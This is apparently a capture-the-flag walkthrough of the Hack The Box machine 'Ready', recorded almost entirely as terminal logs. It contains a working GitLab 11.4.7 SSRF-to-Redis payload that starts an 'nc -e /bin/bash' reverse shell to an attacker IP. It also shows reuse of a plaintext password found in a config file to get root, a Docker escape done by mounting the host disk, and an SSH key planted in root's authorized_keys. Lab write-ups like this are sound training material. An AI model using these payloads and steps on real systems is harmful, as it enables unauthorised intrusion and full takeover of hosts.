$ sudo nmap -p- -T4 -A 10.10.10.220
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
$ nikto -h http://10.10.10.220:5080
+ Server: nginx
+ Uncommon header 'x-runtime' found, with contents: 0.012271
+ Uncommon header 'x-request-id' found, with contents: 5e05f10f-bc4b-46b6-8ed0-2b3a6b0e16f7
+ Root page / redirects to: http://10.10.10.220/users/sign_in
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/autocomplete/users/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/help/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/users/sign_in/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 53 entries which should be manually viewed.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to / over HTTP/1.0. The value is "172.19.0.2".
+ /help/: Help directory should not be accessible
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3092: /search.vts: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ Uncommon header 'x-gitlab-custom-error' found, with contents: 1
+ /help.php: A help file was found.
+ /.well-known/openid-configuration: OpenID Provider Configuration Information.
$ dirb http://10.10.10.220:5080
---- Scanning URL: http://10.10.10.220:5080/ ----
+ http://10.10.10.220:5080/explore (CODE:200|SIZE:13343)
+ http://10.10.10.220:5080/favicon.ico (CODE:301|SIZE:174)
+ http://10.10.10.220:5080/groups (CODE:302|SIZE:105)
+ http://10.10.10.220:5080/help (CODE:200|SIZE:37973)
+ http://10.10.10.220:5080/projects (CODE:302|SIZE:98)
+ http://10.10.10.220:5080/public (CODE:200|SIZE:13422)
+ http://10.10.10.220:5080/robots.txt (CODE:200|SIZE:2095)
+ http://10.10.10.220:5080/root (CODE:200|SIZE:15795)
+ http://10.10.10.220:5080/Root (CODE:302|SIZE:95)
+ http://10.10.10.220:5080/search (CODE:200|SIZE:12693)
+ http://10.10.10.220:5080/snippets (CODE:302|SIZE:107)
+ http://10.10.10.220:5080/test (CODE:200|SIZE:15754)
kali@kali:~/0.htb/machines/Ready220$ curl http://10.10.10.220:5080/robots.txt
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow: /
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler
# Only some crawlers respect this setting, e.g. Googlebot does not
# Crawl-delay: 1
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application
User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in
# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw
# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
kali@kali:~/0.htb/machine
GitLab Community Edition 11.4.7
CVE-2018-14364,CVE-2018-19571,CVE-2018-19585,CVE-2016-9086,CVE-2020-10977
/usr/share/exploitdb/exploits/ruby/webapps/49257.py
GitLab 11.4.7 Remote Code Execution
$ nc -lvp 1234
listening on [any] 1234 ...
New project > Import project > Repo by URL (SSRF via the import URL)
Load the following payload into the project_import_url field:
Payload:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash 10.10.14.133 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
kali@kali:~/0.htb/machines/Ready220$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.220] 47116
python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:~/gitlab-rails/working$ export TERM=xterm
git@gitlab:/home/dude$ ls
user.txt
git@gitlab:/home/dude$ cat user.txt
e1e30b052b6ec0670698805d745e7682
git@gitlab:/home/dude$
git@gitlab:/opt/backup$ cat gitlab.rb | grep smtp
###! Docs: https://docs.gitlab.com/omnibus/settings/smtp.html
###! **Use smtp instead of sendmail/postfix.**
# gitlab_rails['smtp_enable'] = true
# gitlab_rails['smtp_address'] = "smtp.server"
# gitlab_rails['smtp_port'] = 465
# gitlab_rails['smtp_user_name'] = "smtp user"
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_rails['smtp_domain'] = "example.com"
# gitlab_rails['smtp_authentication'] = "login"
# gitlab_rails['smtp_enable_starttls_auto'] = true
# gitlab_rails['smtp_tls'] = false
# gitlab_rails['smtp_openssl_verify_mode'] = 'none'
# gitlab_rails['smtp_ca_path'] = "/etc/ssl/certs"
# gitlab_rails['smtp_ca_file'] = "/etc/ssl/certs/ca-certificates.crt"
git@gitlab:/opt/backup$
git@gitlab:/opt/backup$ su root
Password: wW59U!ZKMbG9+*#h
root@gitlab:/opt/backup#
root@gitlab:/opt/backup# ls -la /root
total 24
drwx------ 1 root root 4096 Dec 13 15:06 .
drwxr-xr-x 1 root root 4096 Dec 1 12:41 ..
lrwxrwxrwx 1 root root 9 Dec 7 16:56 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Dec 7 16:49 .ssh
-rw------- 1 root root 1565 Dec 13 15:06 .viminfo
root@gitlab:/opt/backup#
As we are inside a Docker container, /root here belongs to the container and holds nothing of interest.
Brief info about escaping Docker privileged containers:
https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1
root@gitlab:/opt/backup# ls /tmp/test
root@gitlab:/opt/backup# mkdir /tmp/test
mkdir: cannot create directory '/tmp/test': File exists
root@gitlab:/opt/backup# mount /dev/sda2 /tmp/test
root@gitlab:/opt/backup# cd /tmp/test
root@gitlab:/tmp/test# ls -la
total 100
drwxr-xr-x 20 root root 4096 Dec 7 17:44 .
drwxrwxrwt 1 root root 4096 Apr 22 18:15 ..
lrwxrwxrwx 1 root root 7 Apr 23 2020 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jul 3 2020 boot
drwxr-xr-x 2 root root 4096 May 7 2020 cdrom
drwxr-xr-x 5 root root 4096 Dec 4 15:20 dev
drwxr-xr-x 101 root root 4096 Feb 11 14:31 etc
drwxr-xr-x 3 root root 4096 Jul 7 2020 home
lrwxrwxrwx 1 root root 7 Apr 23 2020 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Apr 23 2020 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Apr 23 2020 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Apr 23 2020 libx32 -> usr/libx32
drwx------ 2 root root 16384 May 7 2020 lost+found
drwxr-xr-x 2 root root 4096 Apr 23 2020 media
drwxr-xr-x 2 root root 4096 Apr 23 2020 mnt
drwxr-xr-x 3 root root 4096 Jun 15 2020 opt
drwxr-xr-x 2 root root 4096 Apr 15 2020 proc
drwx------ 10 root root 4096 Dec 7 17:02 root
drwxr-xr-x 10 root root 4096 Apr 23 2020 run
lrwxrwxrwx 1 root root 8 Apr 23 2020 sbin -> usr/sbin
drwxr-xr-x 6 root root 4096 May 7 2020 snap
drwxr-xr-x 2 root root 4096 Apr 23 2020 srv
drwxr-xr-x 2 root root 4096 Apr 15 2020 sys
drwxrwxrwt 12 root root 12288 Apr 22 23:48 tmp
drwxr-xr-x 14 root root 4096 Apr 23 2020 usr
drwxr-xr-x 14 root root 4096 Dec 4 15:20 var
root@gitlab:/tmp/test# cat /tmp/test/root/root/
cat: /tmp/test/root/root/: No such file or directory
root@gitlab:/tmp/test# cat /tmp/test/root/root.txt
b7f98681505cd39066f67147b103c2b3
---------------let us get root on the host---------------------------------------------------------
kali@kali:~/0.htb/machines/Ready220$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:5AXb1CRlW831MN/vcd4vqVdamrdgQiuwIWNnuL2NpJQ kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| . o++ +oo|
| = o.o +=|
| o o . +|
| .o . .|
| = =S . .o|
| . O + . . o*|
| E + . o o B+|
| . o + . o O o|
| . o . .o +o|
+----[SHA256]-----+
kali@kali:~/0.htb/machines/Ready220$ cat ~/.ssh/id_rsa.pub
ssh-rsa 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 kali@kali
root@gitlab:/tmp/test/root/.ssh# echo 'ssh-rsa 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 kali@kali' >> authorized_keys
root@gitlab:/tmp/test/root/.ssh# ls
authorized_keys id_rsa id_rsa.pub
root@gitlab:/tmp/test/root/.ssh#
kali@kali:~/0.htb/machines/Ready220$ ssh -i id_rsa root@10.10.10.220
Warning: Identity file id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 4.0
186 updates can be installed immediately.
89 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Feb 11 14:28:18 2021
root@ready:~# ls
docker-gitlab ready-channel root.txt snap
root@ready:~# cat root.txt
b7f98681505cd39066f67147b103c2b3
root@ready:~#